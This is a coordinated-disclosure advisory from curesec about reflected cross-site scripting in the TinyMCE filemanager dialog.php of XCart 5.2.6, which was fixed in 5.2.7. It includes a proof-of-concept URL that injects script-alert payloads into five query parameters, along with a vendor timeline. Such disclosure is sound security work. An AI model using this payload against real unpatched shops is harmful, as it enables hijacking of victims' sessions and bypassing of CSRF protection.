XCart 5.2.6: XSS
Date: 2015-11-04 11:09:591. Introduction
| Affected Product: | XCart 5.2.6 |
| Fixed in: | 5.2.7 |
| Fixed Version Link: | https://www.x-cart.com/xc5kit |
| Vendor Contact: | support@x-cart.com |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 08/13/2015 |
| Disclosed to public: | 11/04/2015 |
| Release mode: | Coordinated release |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
There are multiple XSS vulnerabilities in the dialog.php file. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks.
3. Proof of Concept
http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor="><script>alert(1)</script>&lang="><script>alert(2)</script>&field_id="><script>alert(3)</script>&fldr="><script>alert(4)</script>&type="><script>alert(5)</script>
4. Solution
To mitigate this issue please upgrade at least to version 5.2.7:
https://www.x-cart.com/xc5kit
Please note that a newer version might already be available.
5. Report Timeline
| 08/13/2015 | Informed Vendor about Issue |
| 09/03/2015 | Vendor Requests more time |
| 10/19/2015 | Vendor releases fix |
| 11/04/2015 | Disclosed to public |